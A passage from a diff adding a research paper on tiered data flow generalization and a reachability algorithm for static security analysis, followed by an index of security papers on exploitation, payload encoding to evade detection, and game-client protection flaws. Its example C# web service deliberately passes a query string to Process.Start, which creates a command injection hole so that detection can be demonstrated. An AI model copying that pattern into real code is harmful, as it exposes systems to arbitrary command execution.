this information is to define the +formal parameters which represent input and output parameters as being +contained within distinct pseudo blocks. For example, the phi functions +representing formal input parameters can exist within a formal entry pseudo +block. Likewise, the phi functions representing formal output parameters can +exist within a formal exit pseudo block. Both pseudo blocks can then be tied +to the procedure associated with the formal parameters. Defining the +underlying instruction tier phi functions in this way makes it trivial to +retain information that will be needed to define context-sensitive +interprocedural data flow at less-specific generalization tiers. Like the +instruction tier, it is possible to dynamically link data passed to a pseudo +block in a caller's context to subsequent uses in a callee's context. Figure +5 shows the general form that basic block data flow paths may take. + + + .---------. .---------. .---------. + | fin | | fout | | block | + `---------` `---------` `---------` + \ | / + .`-------+--------'. + V V V + .---------. .---------. .---------. + | fin | | fout | | block | + `---------` `---------` `---------` + + Figure 3 + General forms of data flow paths at the basic block tier + +The act of generalizing instruction data flow paths means that two or more +distinct instruction data flow paths may produce the same basic block data +flow path. When this occurs, only one basic block data flow path should be +defined since it will effectively capture the information conveyed by the set +of distinct instruction data flow paths. Each corresponding instruction data +flow path should still be associated with a single basic block data flow path. +This association makes it possible to show the set of instruction data flow +paths that have been generalized by a specific basic block data flow path. +The association can be persisted in a normalized database by creating a +one-to-many link table between basic block and instruction data flow paths. +Figure provides an example of what would happen when generalizing the +instruction data flow paths described in figure 6. + + + .----------. + | fin(f,x) | + `----------` + | + .----------+----------. + V V V + .----------. .----------. .----------. + | block 1 | | block 2 | | block 3 | + `----------` `----------` `----------` + | | | + V | | + .----------. | | + | fin(g,x) | | | + `----------` | | + V V + .----------. .----------. + | fout(g) |-->| block 4 | + `----------` `----------` + | + V + .----------. + | fout(f) | + `----------` + + Figure 6 + Basic block tier data flow paths obtained by generalizing + the instruction data flow paths described in figure 4. These + context for these data flow paths is the f function. + +2.3) Procedure Tier + +Generalizing data flow paths from the basic block tier to the procedure tier +further reduces the amount of information needed to show data flow behavior. +Procedure tier data flow paths are meant to show how data is passed between +procedures through formal parameters. This covers scenarios such as passing a +procedure's formal input parameter to a child procedure's formal input +parameter, using the formal output parameter of a child procedure as the +formal input parameter to another called procedure, and so on. These +behaviors are all represented within the context of a particular procedure. + +Based on these constraints, only two classes ofbasic block data flow paths +need to be considered. The first class involves data traveling from any block +to a formal input or output parameter, thus showing interprocedural flows. +The second class involves data traveling from a formal input or formal output +parameter to a terminal point in a procedure. This effectively eliminates any +intraprocedural data flows that are not carried over to another procedure in +some form. Since data flow information about which formal parameters are used +or defined is conveyed by basic block data flow paths, it is possible to +simply generalize this data flow information to show data flowing to formal +parameters within the context of a given procedure. While it may be tempting +to think that one must only show data flow paths between two formal +parameters, it is also necessary to show data flow paths that originate from +data that is locally defined within a procedure, such as through a local +variable which is not populated by a formal parameter. As such, the general +form that data flow paths may take at the procedure tier is illustrated by +figure 7. Figure 8 provides an example of what would happen when generalizing +the basic block data flow paths described in figure 6. + + + .---------. .---------. .---------. + | fin | | fout | | origin | + `---------` `---------` `---------` + \ | / + .`-------+--------'. + V V V + .---------. .---------. .---------. + | fin | | fout | | origin | + `---------` `---------` `---------` + + Figure 7 + General forms of data flow paths at the procedure tier + + + .----------. .-----------. .----------. + | fin(f,x) | | origin(f) | | fout(g) | + `----------` `-----------` `----------` + | \ | / + | `--------+----------' + V V + .----------. .-----------. + | fin(g,x) | | fout(f) | + `----------` `-----------` + + Figure 8 + Procedure tier data flow paths obtained by generalizing the + basic block data flow paths described in figure 4. The context + for these data flow paths is the f function. + +Procedure data flow paths may generalize multiple basic block data flow paths +and thus can make use of a one-to-many link table to illustrate this +association. While generalizing data flow paths to the procedure tier is +trivial, the challenging aspect comes when determining reachability. This +will be discussed in more detail in section 3. + +2.4) Data Type Tier + +Using data flow information obtained from the procedure tier, it is sometimes +possible, depending on language features, to generalize data flow information +to the data type tier. Generalizing to the data type tier is meant to show +how formal parameters are passed between data types within the context of a +given data type. This relies on the underlying language having the ability to +associate procedures with data types. For example, object-oriented languages +are all capable of associating procedures with data types, such as through +classes defined in C++, C, and other languages. In the case of languages +where data types do not have procedures, it may instead be possible to +associate procedures with the name of the source file that contains them. In +both cases, it is possible to show formal parameters passing between elements +that act as containers for procedures, regardless of whether the underlying +elements are true data types. + +The benefit of generalizing data flow information at the data type tier is +that it helps to further reduce the amount of data flow information that must +be represented. Since the small example source code that has been used to +illustrate generalizations at each tier only involves passing formal +parameters within the same data type, it is useful to consider an alternative +example which involves passing data between multiple data types. + +class Company { + void AddEmployee(int num) { + Person employee = new Person(num); + employees.Add(employee); + Console.WriteLine("New employee {0}", employee); + } + int EmployeeCount() { + return employees.Count; + } + private ArrayList employees; +} + +Figure 9 shows the data type data flow paths for the example code shown above. +It is important to note that unlike previous tiers, the specific formal +parameters that are being passed between types is not preserved. Instead, +only the fact that formal parameters are passed between data types is +retained. In this manner, fin indicates a data type's formal input parameter +and fout indicates a data type's formal output parameter. + + + .---------------------. .--------------. + | fin(System.Console) |<-----| fout(Person) | + `---------------------` `--------------` + | + .-----------------------. / + | fin(System.ArrayList) |<---------` + `-----------------------` + + .--------------. + | fin(Company) | + `--------------` + | + V + .-------------. + | fin(Person) | + `-------------` + + .------------------------. .---------------. + | fout(System.ArrayList) |---->| fout(Company) | + `------------------------` `---------------` + + Figure 9 + Data type tier data flow paths obtained by generalizing the + procedure tier data flow paths. The context for these data + flow paths is the Company data type. + +In a fashion much the same as previous generalization tiers, a single data +type data flow path can represent multiple underlying procedure data flow +paths. Each generalized procedure data flow path can be associated with its +corresponding data type data flow path through a one-to-many link table in a +normalized database. + +2.5) Module Tier + +Generalizing data flow information to the module tier is meant to show how +data flows between distinct modules. As with each step in the generalization +process, the module tier data flow paths lose much of the information that is +conveyed at more specific tiers. Figure shows module tier data flow paths +that would be defined when generalizing the data type data flow paths +illustrated in figure 10. + + + .------------------. .-----------------. + | fin(Company.dll) | | fin(System.dll) | + `------------------` `-----------------` + | ^ + V | + .-----------------. .------------------. + | fin(Person.dll) | | fout(Person.dll) | + `-----------------` `------------------` + + .------------------. .-------------------. + | fout(System.dll) |----->| fout(Company.dll) | + `------------------` `-------------------` + + Figure 10 + Module tier data flow paths obtained by generalizing the + data type tier data flow paths. The context for these data + flow paths is the Company.dll module. + +2.6) Abstract Tiers + +Once data flow paths have been generalized from the instruction tier through +the module tier, it is no longer possible to create additional concrete +generalizations for most runtime environments An exception to this is managed +code which has an additional concrete assembly tier. Even though it may not +be possible to establish concrete generalizations, it is possible to define +abstract generalizations. An abstract generalization attempts to show data +flow relationships between abstract elements. A good example of an abstract +element would be a logical component which is defined in the architecture of a +given application. For example, a VPN client application might be composed of +a user interface component and a networking component, each of which may +consist of multiple concrete modules. By defining logical components and +associating concrete modules with each component, it is possible to further +generalize information beyond the module tier. + +Given the example described above, it may be prudent to define two abstract +generalization tiers. The first abstract tier is the component tier. In this +context, a component is defined as a logical software component that contains +one or more concrete modules. The component tier makes it possible to +illustrate data flow between conceptual components within an application as +derived from how data flows between concrete modules. The second abstract +tier is the application tier. The application tier can be used to illustrate +how data is passed between conceptual applications. For example, a web +browser application passes data in some form to a web server application, both +of which consist of conceptual components which, in turn, consist of concrete +modules. + +The caveat with abstract generalization tiers is that it must be possible to +illustrate data flow between what may otherwise be disjoint concrete elements. +The reason for this is that, often times, the paths that data will take +between two modules which belong to different logical components will be +entirely indirect with respect to one another. For this reason, it is +necessary to devise a mechanism to bridge data flow paths between concrete +software elements that belong to each logical component or application. A +particularly useful example of an approach that can be taken to bridge two +distinct components can be found in web services. + +In a web services application, it is often common to have a client component +and a server component. The two components pass data to one another through +an indirect channel, such as through a web request. For this reason, it is +not immediately possible to show direct data flow paths from a web client +component to a web service component. To solve this problem, one can define a +mechanism that bridges the formal parameters associated with the web service +method that is being invoked. In this manner, the the formal input parameters +for a web service method found on the client side can be implicitly linked and +shown to define the formal input parameters received on the web service +side. By illustrating data flow at a concrete tier, it is possible to +generalize data flow behaviors all the way up through the abstract tiers. + +The benefit of describing data flow behavior at abstract tiers is that it +makes it possible to derive data flow behaviors between abstract software +elements rather than strictly focusing on concrete software elements. This is +useful when attempting to view an application's behavior at a glance rather +than worrying about the specific details relating to how data is passed. For +example, this could be used to help validate threat models which describe how +data is expected to be passed between abstract components within an +application. + +When generalizing information at abstract tiers, the only information that can +be conveyed, at least based on the approach described thus far, is whether or +not a component or application are passing data through a formal input or +formal output parameter. The specifics of which formal parameters are passed +is no longer available for use in generalization. Using the example shown at +the data type tier, one might assume the following component associations: +Company.dll and Person.dll, which contain the Company data type and Person +data type, are part of the user interface component of a human resources +application. The classes used from system libraries can be generically +grouped as belonging to an external library component. Using these, +groupings, the component data flow paths may be represented as shown in figure +11. + + .------------------------. .-----------------------. + | fout(External Library) | | fin(External Library) | + `------------------------` `-----------------------` + | ^ + V | + .----------------------. .---------------------. + | fout(User Interface) | | fin(User Interface) | + `----------------------` `---------------------` + + Figure 11 + Component tier data flow paths obtained by generalizing the + module tier data flow paths. The context for these data flow + paths is the user interface component. + +As with all previously described generalization tiers, a single component data +flow path may represent multiple module data flow paths. The single component +data flow path should be associated with each corresponding module data flow +path through a one-to-many link table in a normalized database. + +3) Reachability + +The real benefit of the generalizations described in can be realized when +attempting to solve a graph reachability problem. By generalizing data flow +behaviors to both abstract and concrete generalization tiers, it is possible +to reduce the amount of information that must be represented when attempting +to determine graph reachability. This is further improved by the fact that +data flow paths found at less-specific generalization tiers can be used to +progressively qualify potential data flow paths at more-specific +generalization tiers. This qualification is possible due to the fact that +less-specific data flow paths are associated with more-specific data flow +paths at each generalization tier through a one-to-many link table, thus +permitting trivial expansion. The benefit of qualifying data flow paths in +this fashion is that only the minimal set of information needed to determine +reachability must be considered at once at each generalization tier. This can +drastically reduce the physical resources required to solve a graph +reachability problem by effectively limiting the size of a graph. This +general approach is captured by the Progressive Qualified Elaboration (PQE) +algorithm described by . This concept is very similar to the ideas outlined +by Schultes' highway hierarchy which is used to optimize fast path discovery +when identifying travel routes in road networks[16]. + + +PQE(Elements, SourceDescriptor, SinkDescriptor) + Paths := 0 + Graph := BuildGraph(Elements) + + while Graph != 0 + SourceVertices := Vertices(Graph, SourceDescriptor) + SinkVertices := Vertices(Graph, SinkDescriptor) + Paths := Reachability(Graph, SourceVertices, SinkVertices) + ElaboratedPaths := Elaborate(Paths) + Graph := BuildGraph(ElaboratedPaths) + end + + return Paths +end + +For the purposes of this paper, graph reachability is restricted to +determining realizable paths between two flow descriptors: a source and a +sink. A flow descriptor provides information that is needed to identify +corresponding vertices within a graph at each generalization tier. The tables +in figure and figure show the information needed to identify source and sink +vertices at each generalization tier for the example that will be described in +this section. + +The PQE algorithm itself requires three parameters. The first parameter, +Elements, contains the set of generalized elements to be analyzed. For +example, it may contain the set of target modules that should be analyzed. +The second and third parameters, SourceDescriptor and SinkDescriptor, +represent the source and sink flow descriptors, respectively. + +The first step taken by the algorithm is to define Paths as an empty set. +Paths will be used to contain the set of reachable paths between an actual set +of sources and sinks at a given generalization tier. After Paths has been +initialized, Graph is initialized to a flow graph that conveys data flow +relationships between the set of elements provided in . The approach taken to +construct the flow graph involves retrieving persisted data flow information +for the appropriate generalization tier. Once Paths and Graph have been +initialized, the qualified elaboration process can begin. + +For each loop iteration, a check is made to see if Graph is an empty graph +(contains no vertices). If Graph is empty, the loop terminates. If Graph is not an +empty graph, reachable paths between the actual set of sources and sinks are +determined. This is accomplished by first identifying the vertices in that +are associated with the flow descriptors SourceDescriptor and SinkDescriptor +at the current generalization tier. The actual set of sources and sinks found +to be associated with these descriptors are stored in SourceVertices and +SinkVertices, respectively. With the set of actual source and sink vertices +identified, a reachability algorithm, Reachability(), can be used to determine +the set of reachable paths in flow graph between the two sets of vertices. +The result of this determination is stored in Paths. The final step in the +iteration involves using qualified elaboration to construct a new flow graph +containing more-specific data flow paths which are qualified by the set of +data flow paths encountered in the reachable paths found in Paths. This set +is then elaborated to a subset that contains the associated data flow paths +from the next, more specific tier, such as by elaborating to a subset of basic +blocks data flow paths from a more general set of procedure data flow paths. +The result of the elaboration is stored in ElaboratedPaths. Finally, a new +flow graph is constructed and stored in Graph using the elaborated set of flow +paths contained within ElaboratedPaths. + +When it is not possible to obtain a more-detailed flow set, such as when the +instruction tier is reached, an empty graph is created and the algorithm +completes by returning . In the final iteration, Paths contains the most detailed +set of reachable data flow paths found between the source and sink flow +descriptors. The benefit of approaching graph reachability problems in this +fashion is that only a subset of the elements at any generalization tier need +to be considered at once. These subsets are dictated by the set of reachable +data flow paths found at each preceding generalization tier. In this manner, +the subset of procedure data flow paths that need to be considered would be +effectively qualified by the set of data types and modules found to be +involved in data flow paths between the source and sink flow descriptors at +less-specific tiers. + +For the purposes of this paper, the algorithm is designed to consider +realizable paths at each generalization tier in manner that is similar to the +concept described by Reps et al. This involves traversing the graph in +context-sensitive fashion. To accomplish this, the algorithm keeps a scope +stack at each generalization tier. The scope may be an assembly, a type, or a +procedure. When data is passed through to a formal input parameter, the scope +for the formal input parameter is pushed onto the stack. When data is +returned through a formal output parameter to another location, the +algorithm ensures that the scope that is being returned to is the parent +scope. In this way, only realizable paths are considered at each +generalization tier which limits the number of paths that must be +considered and also has the benefit of producing more accurate results. + +The specific algorithm used for the function involves using the set of data +flow paths found at a less-specific tier to identify the set of more-specific +data flow paths that have been generalized. This is accomplished by simply +using the one-to-many link tables that were populated during generalization to +determine the subset of data flow paths that must be considered at the next +generalization tier. For example, elaborating from a set of procedure data +flow paths would involve determining the complete set of basic block data flow +paths that have been generalized by the affected set of procedure data flow +paths. + +Based on this general description of the algorithm, it is useful to consider a +concrete example This section provides a concrete illustration by determining +reachability between a source and a sink using an example web application that +consists of a web client and a web service component. This is illustrated by +progressively drilling down through each generalization tier starting from the +least-specific tier, the abstract tier, and working toward the most-specific +tier, the instruction tier. At each tier, a description of the number of data +flow paths that must be represented and the number of reachable data flow +paths found is given. This particular example will attempt to determine +concrete reachable data flow paths between the return value of +HttpRequest.getQueryString and the first formal input parameter of +Process.Start. The implications of a reachable path between these two points +could be indicative of a command injection vulnerability within the +application. The tables in figure 12 and figure 13 show the flow descriptors for +the source and sink, respectively. These flow descriptors are used to +identify associated vertices at each generalization tier. + + +-------------+------------------------------+ + | Tier | Information | + +-------------+------------------------------+ + | Component | fout(Undefined) | + | Module | fout(System.Web.dll) | + | Data Type | fout(System.Web.HttpRequest) | + | Procedure | fout(get_QueryString, 0) | + | Basic Block | fout(get_QueryString, 0) | + | Instruction | fout(get_QueryString, 0) | + +-------------+------------------------------+ + + Figure 12 + Source flow descriptor for the return value of + HttpRequest.get_QueryString + + +-------------+---------------------------------+ + | Tier | Information | + +-------------+---------------------------------+ + | Component | fin(Undefined) | + | Module | fin(System.dll) | + | Data Type | fin(System.Diagnostics.Process) | + | Procedure | fin(Start, 0) | + | Basic Block | fin(Start, 0) | + | Instruction | fin(Start, 0) | + +-------------+---------------------------------+ + + Figure 13 + Sink flow descriptor for the first formal parameter + of Process.Start + +For this illustration, there is in fact a data flow path that exists from the +source descriptor to the sink descriptor. However, unlike conventional data +flow paths, this data flow path happens to cross an abstract boundary between +the two components. In this case, data is passed from the web client +component through an HTTP request to a method hosted by the web service +component. This path can be seen by first looking at a portion of the web +client code: + +class Program { + static void Main(string[] args) { + HttpRequest request = new HttpRequest( + "a","b","c"); + WebClient client = new WebClient(); + + client.ExecuteCommand( + request.QueryString["abc"]); + } +} +[WebServiceBinding] +public class WebClient : SoapHttpClientProtocol { + [SoapDocumentMethod] + public void ExecuteCommand(string command) { + Invoke("ExecuteCommand", + new object[] { command }); + } +} + +In this contrived example, data is shown as being passed from a query string +obtained from what is presumably a real HTTP request to the client portion of +the web service method ExecuteCommand. The web service application, in turn, +contains the following code: + +[WebService] +public class WebService { + [WebMethod] + public void ExecuteCommand(string command) { + System.Diagnostics.Process.Start(command); + } +} + +In conventional tools, it would not be possible to directly model this data +flow path because the data flow path is indirect. However, using a simple +methodology to bridge the client-side formal input parameters with the +server-side formal input parameters at the instruction tier, it is possible to +connect the two and represent data flow between the two conceptual software +elements at each generalization tier. The following sections will provide +visual examples of how the PQE algorithm narrows down and eliminates +unnecessary data flow paths at each generalization tier by progressively +qualifying data flow information. One thing to note about the graphs at each +tier is that implicit edges have been created between formal input and output +parameters that reside in external (un-analyzed) libraries. This is done +under the assumption that a formal input parameter may affect a formal output +parameter in some way in the context of the code that is not analyzed. If all +target code paths have been analyzed, then this is not necessary. The graphs +shown at each tier were automatically generated but have been modified to +allow them to fit within the margins of this document and in some cases +highlight important features. + +3.1) Abstract Tiers + +Abstract tiers represent the most general view of the data flow behaviors of +an application. The data flow behavior is modeled with respect to abstract +software elements, such as a component, rather than concrete software +elements, such as a module or a type. For this example, it is assumed that +the PQE algorithm begins by modeling data flow behaviors between conceptual +components in a web application. The web application is composed of two +manually defined abstract components, a Web Client and a Web Service. These +two components both rely on external libraries, as represented by the +Undefined component, which are outside of the scope of the application itself. +When starting at the abstract tier, all abstract data flow paths must be +considered as potential data flow paths. The component tier data flow graph +for this application is shown in figure 14. + + + .--------------------. + .------| origin(Web Client) | + | `--------------------` + V | + .----------------. | + | fin(Undefined) |<---. | + `----------------` \ | + .-^ | ^ | | + / V | | | + | .----------------. | | + | | fin(Undefined) | | | + | `----------------` | | + | \ | | + | `--. | | + | V | V + .------------------. .-----------------. + | fin(Web Service) |<---| fin(Web Client) | + `------------------` `-----------------` + | | ^ + V V | + .------------------. .------------------. + | fin(Web Service) | | fout(Web Client) | + `------------------` `------------------` + + Figure 14 + Complete compenet tier data flow graph for the + web application. + +Using the data flow graph shown in figure 14, PQE uses the Reachability() +algorithm to determine data flow paths between a formal output parameter in +the Undefined component and a formal input parameter in the Undefined +component. At this generalization tier, there are many different paths that +can be taken between these two components. This effectively results in the +qualification of nearly all of the assembly tier data flow paths. These data +flow paths are used to represent the data flow graph at the assembly tier. + +In this example, PQE offers no improvements at abstract tiers because it is a +requirement that all abstract data flow information be represented. Since the +amount of information required to represent abstract data flow is minimal, +this is not seen as a deficiency. Furthermore, for this particular example, +nearly all component data flow paths are found to be involved in reachable +paths. At worst, this is indicative that for small applications, it may not +be necessary to start the algorithm by looking at abstract data flow +information. Instead, one might immediately progress to the module or data +type tiers. + +3.2) Module Tier + +The module tier uses the set of data flow paths found at the abstract +component tier to construct a data flow graph that shows the data flow +relationships between formal input and formal output parameters passed between +modules. The graph is generated using the one-to-many table that was +populated during generalization which conveys the module data flow paths that +were generalized by the set of qualified component data flow paths. For this +particular example, nearly all of the module data flow paths were qualified as +potentially being involved in a reachable path between the source and sink +flow descriptor. The graph that is generated as a result is shown in figure +15. + + + + + + + + + + +Using this graph, the Reachability() algorithm is again employed to find paths +between the source and sink flow descriptor at the module tier. In this case, +only the edges between the nodes highlighted in dark orange are found to be +involved in reachable paths between fout(System.Web) and fin(System). The +important thing to note is that even at the module tier, a data flow path is +illustrated between fin(WebClient) and fin(WebService). This will be a trend +that will continue to each more specific generalization tier. + +3.3) Data Type Tier + +The data type tier uses the set of data flow paths found at the module tier to +construct a data flow graph that shows the data flow relationships between +formal input and formal output parameters passed between data types. The +graph is generated using the one-to-many table that was populated during +generalization which conveys the data type data flow paths that were +generalized by the set of qualified module data flow paths. The graph that is +generated as a result is shown in figure 16. + + + + + + + + + +Using the graph, the Reachability() algorithm is again employed to find paths +between the source and sink flow descriptor at the data type tier. Due to the +simplicity of the example application, only a few data flow paths were +rendered. The complete data flow path from fout(System.Web.HttpRequest) to +fin(System.Diagnostics.Process.Start) can be clearly seen. + +3.4) Procedure Tier + +The procedure tier uses the set of data flow paths found at the data type tier +to construct a data flow graph that shows the data flow relationships between +formal input and formal output parameters passed between procedures. Unlike +previous tiers, procedure tier data flow paths explicitly identify the formal +parameter index that data is being passed to. This helps to further isolate +data flow paths from one another and improves the overall accuracy of paths +that are selected. The graph is generated using the one-to-many table that +was populated during generalization which conveys the procedure data flow +paths that were generalized by the set of qualified data type data flow paths. +The graph that is generated as a result is shown in figure 17. + + + + + + + + + +Using the graph, the Reachability() algorithm is again employed to find paths +between the source and sink flow descriptor at the procedure tier. Due to the +simplicity of the example application, only a few data flow paths were +rendered. The complete data flow path from fout(getQueryString, 0) to +fin(Start, 0) can be clearly seen. + +3.5) Basic Block Tier + +The basic block tier uses the set of data flow paths found at the procedure +tier to construct a data flow graph that shows the data flow relationships +between formal input and formal output parameters passed between basic blocks. +Like the procedure tier, basic block tier data flow paths also explicitly +identify the formal parameter index that data is being passed to. The graph +is generated using the one-to-many table that was populated during +generalization which conveys the basic block data flow paths that were +generalized by the set of qualified procedure data flow paths. The graph that +is generated as a result is shown in figure 18. Due to the way that Phoenix +currently represents basic blocks, the basic block tier data flow paths offer +very little generalization beyond the instruction tier. + + + + + + + + + +Using the graph, the Reachability() algorithm is again employed to find paths +between the source and sink flow descriptor at the basic block tier. Due to +the simplicity of the example application, only a few data flow paths were +rendered. The complete data flow path from fout(getQueryString, 0) to +fin(Start, 0) can be clearly seen. + +3.6) Instruction Tier + +The instruction tier uses the set of data flow paths found at the basic block +tier to construct a data flow graph that shows the data flow relationships +between formal input and formal output parameters passed between instructions. +Like the basic block tier, instruction tier data flow paths also explicitly +identify the formal parameter index that data is being passed to. The graph +is generated using the one-to-many table that was populated during +generalization which conveys the instruction data flow paths that were +generalized by the set of qualified basic block data flow paths. The graph +that is generated as a result is shown in figure 19. The instruction tier +data flow paths represent the final step taken by the algorithm as they +contain the most specific description of data flow paths. + + + + + + + + + +Using the graph, the Reachability() algorithm is again employed to find paths +between the source and sink flow descriptor at the instruction tier. Due to +the simplicity of the example application, only a few data flow paths were +rendered. The complete data flow path from fout(getQueryString, 0) to +fin(Start, 0) can be clearly seen along with source lines that are encountered +along the way. + +4) Acknowledgements + +The author would like to thank Rolf Rolles, Richard Johnson, Halvar Flake, +Jordan Hind, and many others for thoughtful discussions and feedback. + +5) Conclusion + +This document has attempted to convey the potential benefits of generalizing +data flow information along generalization tiers. Each generalization tier is +used to represent the data flow behaviors of an abstract or concrete software +element such as an instruction, basic block, procedure, and so on. Using this +concept, data flow information can be collected at the most specific tier, the +instruction tier, and then generalized to increasingly less-specific tiers. +The generalization process has the effect of reducing the amount of data that +must be considered at once while still conveying a general description of the +manner in which data flows within an application. + +Generalized data flow information can be immediately used in conjunction with +existing graph reachability problems. For instance, a common task that +involves determining reachable data flow paths between a conceptual source and +sink location within an application can potentially benefit from operating on +generalized data flow information. This paper has illustrated these potential +benefits by defining the Progressive Qualified Elaboration (PQE) algorithm +which can be used to progressively determine reachability at each +generalization tier. By starting at the least specific generalization tier +and progressing toward the most specific, it is possible to restrict the +amount of data flow information that must be considered at once to a minimal +set. This is accomplished by using reachable paths found at each +generalization tier to qualify the set of data flow paths that must be +considered at more specific generalization tiers. + +While these benefits are thought to be present, the author has yet to +conclusively prove this to be the case. The results presented in this paper +do not prove the presumed usefulness of generalizing data flow information +beyond the procedure tier. The author believes that analysis of large +applications involving hundreds of modules could benefit from generalizing +data flow information to the data type, module, and more abstract tiers. +However, at the time of this writing, conclusive data has not been +collected to prove this usefulness. The author hopes to collect +information that either confirms or refutes this point during future +research. + +At present, the underlying implementation used to generate the results +described in this paper has a number of known limitations. The first +limitation is that it does not currently take into account formal parameters +that are not passed at a call site, such as fields, global variables, and so +on. This significantly restricts the accuracy of the data flow model that it +is currently capable of generating. This limitation represents a more general +problem of needing to better refine the underlying completeness of the data +flow information that is captured. + +While the algorithms presented in this paper were portrayed in the context of +data flow analysis, it is entirely possible to apply them to other fields as +well, such as control flow analysis. The PQE algorithm itself is conceptually +generic in that it simply describes a process that can be employed to qualify +the next set of analysis information that must be considered from a more +generic set of analysis information. This may facilitate future research +directions. + +References + +[1] Atkinson, Griswold. Implementation Techniques for Efficient Data-flow Analysis of Large Programs. + Proceedings of the IEEE International Conference on Software Maintenance (ICSM'01). 2001. + http://www.cse.scu.edu/ atkinson/papers/icsm-01.ps + +[2] Das, M. Static Analysis of Large Programs: Some Experiences + 2000. http://research.microsoft.com/manuvir/Talks/pepm00.ppt + +[3] Das, M., Lerner, S., Seigle, M. ESP: Path-Sensitive Program Verification in Polynomial Time. + Proceedings of the SIGPLAN 2002 Conference on programming language design. 2002. + http://www.cs.cornell.edu/courses/cs711/2005fa/papers/dls-pldi02.pdf + +[4] Das, M., Fahndrich, M., Rehof, J. From Polymorphic Subtyping to CFL Reachability: Context-Sensitive Flow Analysis Using Instantiation Constraints. 2000. + http://research.microsoft.com/research/pubs/view.aspx?msr_tr_id=MSR-TR-99-84 + +[5] Dinakar Dhurjati1, Manuvir Das, and Yue Yang. + Path-Sensitive Dataflow Analysis with Iterative Refinement. + SAS'06: The 13th International Static Analysis Symposium, Seoul, August 2006. + +[6] Erikson, Manocha. Simplification Culling of Static and Dynamic Scene Graphs. + TR9809-009 by University of North Carolina at Chapel Hill. 1998. citeseer.ist.psu.edu/erikson98simplification.html + +[7] Horwitz, S., Reps, T., and Binkley, D., Interprocedural slicing using dependence graphs. + In Proceedings of the ACM SIGPLAN 88 Conference on Programming Language Design and Implementation, + (Atlanta, GA, June 22-24, 1988), ACM SIGPLAN Notices 23, 7 (July 1988), pp. 35-46. + +[8] Horwitz, S., Reps, T., and Binkley, D., Retrospective: Interprocedural slicing using dependence graphs. + 20 Years of the ACM SIGPLAN Conference on Programming Language Design and Implementation (1979 - 1999): + A Selection, K.S. McKinley, ed., ACM SIGPLAN Notices 39, 4 (April 2004), 229-231. + +[9] Gregor, D., Schupp, S. Retaining Path-Sensitive Relations across Control Flow Merges. + Technical report 03-15, Rensselaer Polytechnic Institute, November 2003. + http://www.cs.rpi.edu/research/ps/03-15.ps + +[10] Kiss, Ja´sz, Lehotai, Gyimo´thy. Interprocedural Static Slicing of Binary Executables. + http://www.inf.u-szeged.hu/ akiss/pub/kiss_interprocedural.pdf + +[11] Microsoft Corporation. Phoenix Framework. + http://research.microsoft.com/phoenix/ + +[12] Naumovich, G., Avrunin, G. S., and Clarke, L. A. 1999. + Data flow analysis for checking properties of concurrent Java programs. + In Proceedings of the 21st international Conference on Software Engineering + (Los Angeles, California, United States, May 16 - 22, 1999). + International Conference on Software Engineering. + IEEE Computer Society Press, Los Alamitos, CA, 399-410. + +[13] Reps, T., Horwitz, S., and Sagiv, M., Precise interprocedural dataflow analysis via graph reachability. + In Conference Record of the 22nd ACM Symposium on Principles of Programming Languages, + (San Francisco, CA, Jan. 23-25, 1995), pp. 49-61. + +[14] Reps, T., Sagiv, M., and Horwitz S., Interprocedural dataflow analysis via graph reachability. + TR 94-14, Datalogisk Institut, University of Copenhagen, Copenhagen, Denmark, April 1994. + +[15] A. Rountev, B. G. Ryder, and W. Landi. Dataflow analysis of program fragments. + In Proc. Symp. Foundations of Software Engineering, LNCS 1687, pages 235--252, 1999. + http://citeseer.ist.psu.edu/rountev99dataflow.html + +[16] Schultes, Dominik. Fast and Exact Shortest Path Queries Using Highway Hierachies. 2005. + http://algo2.iti.uka.de/schultes/hwy/hwyHierarchies.pdf diff --git a/uninformed/8.txt b/uninformed/8.txt new file mode 100644 index 0000000..893a1ba --- /dev/null +++ b/uninformed/8.txt @@ -0,0 +1,22 @@ +Engineering in Reverse +An Objective Analysis of the Lockdown Protection System for Battle.net +Skywing +Near the end of 2006, Blizzard deployed the first major update to the version check and client software authentication system used to verify the authenticity of clients connecting to Battle.net using the binary game client protocol. This system had been in use since just after the release of the original Diablo game and the public launch of Battle.net. The new authentication module (Lockdown) introduced a variety of mechanisms designed to raise the bar with respect to spoofing a game client when logging on to Battle.net. In addition, the new authentication module also introduced run-time integrity checks of client binaries in memory. This is meant to provide simple detection of many client modifications (often labeled "hacks") that patch game code in-memory in order to modify game behavior. The Lockdown authentication module also introduced some anti-debugging techniques that are designed to make it more difficult to reverse engineer the module. In addition, several checks that are designed to make it difficult to simply load and run the Blizzard Lockdown module from the context of an unauthorized, non-Blizzard-game process. After all, if an attacker can simply load and run the Lockdown module in his or her own process, it becomes trivially easy to spoof the game client logon process, or to allow a modified game client to log on to Battle.net successfully. However, like any protection mechanism, the new Lockdown module is not without its flaws, some of which are discussed in detail in this paper. +html | pdf | txt + +Exploitation Technology +ActiveX - Active Exploitation +warlord +This paper provides a general introduction to the topic of understanding security vulnerabilities that affect ActiveX controls. A brief description of how ActiveX controls are exposed to Internet Explorer is given along with an analysis of three example ActiveX vulnerabilities that have been previously disclosed. +html | pdf | txt + +Context-keyed Payload Encoding +I)ruid +A common goal of payload encoders is to evade a third-party detection mechanism which is actively observing attack traffic somewhere along the route from an attacker to their target, filtering on commonly used payload instructions. The use of a payload encoder may be easily detected and blocked as well as opening up the opportunity for the payload to be decoded for further analysis. Even so-called keyed encoders utilize easily observable, recoverable, or guessable key values in their encoding algorithm, thus making decoding on-the-fly trivial once the encoding algorithm is identified. It is feasible that an active observer may make use of the inherent functionality of the decoder stub to decode the payload of a suspected exploit in order to inspect the contents of that payload and make a control decision about the network traffic. This paper presents a new method of keying an encoder which is based entirely on contextual information that is predictable or known about the target by the attacker and constructible or recoverable by the decoder stub when executed at the target. An active observer of the attack traffic however should be unable to decode the payload due to lack of the contextual keying information. +html | pdf | txt + +Improving Software Security Analysis using Exploitation Properties +skape +Reliable exploitation of software vulnerabilities has continued to become more difficult as formidable mitigations have been established and are now included by default with most modern operating systems. Future exploitation of software vulnerabilities will rely on either discovering ways to circumvent these mitigations or uncovering flaws that are not adequately protected. Since the majority of the mitigations that exist today lack universal bypass techniques, it has become more fruitful to take the latter approach. It is in this vein that this paper introduces the concept of exploitation properties and describes how they can be used to better understand the exploitability of a system irrespective of a particular vulnerability. Perceived exploitability is of utmost importance to both an attacker and to a defender given the presence of modern mitigations. The ANI vulnerability (MS07-017) is used to help illustrate these points by acting as a simple example of a vulnerability that may have been more easily identified as code that should have received additional scrutiny by taking exploitation properties into consideration. +html | pdf | txt + diff --git 